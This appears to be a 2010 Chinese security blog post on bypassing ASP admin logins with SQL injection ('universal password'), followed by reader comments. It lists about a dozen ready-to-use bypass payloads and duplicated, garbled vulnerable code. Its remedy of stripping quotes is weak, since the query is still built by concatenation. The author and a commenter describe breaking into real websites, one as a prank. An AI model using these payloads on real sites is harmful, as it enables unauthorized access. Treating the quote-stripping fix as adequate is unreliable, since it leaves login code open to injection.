万能密码漏洞详解
万能密码,这个就是传说中的’or’='or’了,虽然危害很大,可直接饶过后台验证,进入后台,是不是感觉很强大啊。
-
万能密码原理
在登陆后台时,接收用户输入的Userid和Password数据,并分别赋值给user和pwd,然后再用 sql=”select * from admin where username=”&user&” and password=”&pwd&”" 这句来对用户名和密码加以验证。
以常理来考虑的话,这是个很完整的程序了,而在实际的使用过程中,整套程序也的确可能正常使用。但是如果Userid的值和password的值被赋于:safer’ or’1’=’1’ 这时,sql=”select * from admin where adminname=’”&request.form(“adminname)&”‘ and adminpass=’”&request.form(“adminpass”)&”‘”变成了 sql=”select * from admin where adminname=”or’='or” and adminpass=”or’='or”从而返回真,跳过认证。
-
万能密码的利用
后台帐号和密码有以下几种形式(都使用一个,一般不可交叉使用):
- :”or “a”=”a
- : ‘)or(‘a’='a
- :or 1=1–
- :’or 1=1–
- :a’or’ 1=1–
- :”or 1=1–
- :’or’a'=’a
- :”or”=”a’='a
- :’or”=’
- :’or’='or’
- :最短的万能登陆密码 ‘or’1
- :’or 1 or’或’or”=”or’
-
万能密码修补方法
在后台登录文件源代码中找到这些代码:
1 <%
2
3 pwd = request.form(“pwd”)
4
5 name = request.form(“name”)
6
7 Set rs = Server.CreateObject(“ADODB.Connection”)
8
9 sql = “select * from Manage_User where UserName=’” & name & “‘ And PassWord=’”&encrypt(pwd)&”‘”
2
3 pwd = request.form(“pwd”)
4
5 name = request.form(“name”)
6
7 Set rs = Server.CreateObject(“ADODB.Connection”)
8
9 sql = “select * from Manage_User where UserName=’” & name & “‘ And PassWord=’”&encrypt(pwd)&”‘”
由于接受变量pwd、name时没有做任何处理。才导致这个漏洞。我们要让它进行处理,过滤掉“’”符号。只要把文件改成以下代码即可:
1 <%
2
3 pwd = replace(trim(request.form(“pwd”)),”‘”,”")
4
5 name = replace(trim(request.form(“name”)),”‘”,”")
6
7 Set rs = Server.CreateObject(“ADODB.Connection”)
8
9 sql = “select * from Manage_User where UserName=’” & name & “‘ And PassWord=’”&encrypt(pwd)&”‘”
2
3 pwd = replace(trim(request.form(“pwd”)),”‘”,”")
4
5 name = replace(trim(request.form(“name”)),”‘”,”")
6
7 Set rs = Server.CreateObject(“ADODB.Connection”)
8
9 sql = “select * from Manage_User where UserName=’” & name & “‘ And PassWord=’”&encrypt(pwd)&”‘”
其实现在网上这个漏洞已经很少了,不过前几天学这块的时候,我还是在网上找到了一个可以利用的漏洞,呵呵。。。但是作为网络安全初学者,这是基本知识,是需要了解的!
网上有些网站屏蔽这个漏洞是用的js脚本,只要我们稍微坐下手脚,还是可以继续利用这个漏洞的,以后再介绍。。。
上一篇: 小杰回来啦
下一篇: 突破ASP过滤系统从后台入侵网站
赞助商广告
| 由
2010/12/09 17:40:47
呵呵~~现在的网站,基本上很少能用这么简单的方法就能进入后台的了~
2010/12/09 18:02:52
的确是这样啊,基本是没有了
2010/10/14 17:20:34
好早的技术了,现在即使ASP的程序也很少有这样的洞了
2010/10/14 22:44:59
还是有的哦,不过很少了,我前一段时间发现过一个游戏站的,呵呵
2010/08/22 14:38:28
呵呵,不怕不怕~~
2010/08/20 20:16:00
[...] 昨天介绍过了 万能密码漏洞详解 。不少朋友们和我说这个漏洞现在基本没有了,这个确实是,不过这是基本嘛,了解一下啦,这个可是想当年的时候红极一时啊!呵呵。。。现在运气好的话也许能碰到一个没有修复这个漏洞的网站。 [...]
2010/08/20 18:19:33
找到的几率很小。。我也只成功进入过一个站,,也只是给那站恶搞了下。。
2010/08/20 19:09:14
呵呵。。。看来你的运气也还不错嘛
2010/08/20 14:27:47
万能密码啊~~真不错
2010/08/19 16:36:28
谢谢博主!读了很受益!网址已经收藏了。
2010/08/19 16:35:09
这种漏洞很少了,除非那个站是个人或小公司随便开发出来的。
2010/08/19 16:56:42
很少了,了解一下而已,呵呵。。。什么都要从最简单的开始嘛
2010/08/19 15:04:01
我的站姑且没发现漏洞。
2010/08/19 16:57:04
不会有的,呵呵。。。不然谁还用wp啊
2010/08/19 14:40:35
现在的站貌似很少出现这个漏洞了吧
2010/08/19 16:57:42
不是貌似,是真的很少,不过还是能找到的哦,我就找到一个,嘿嘿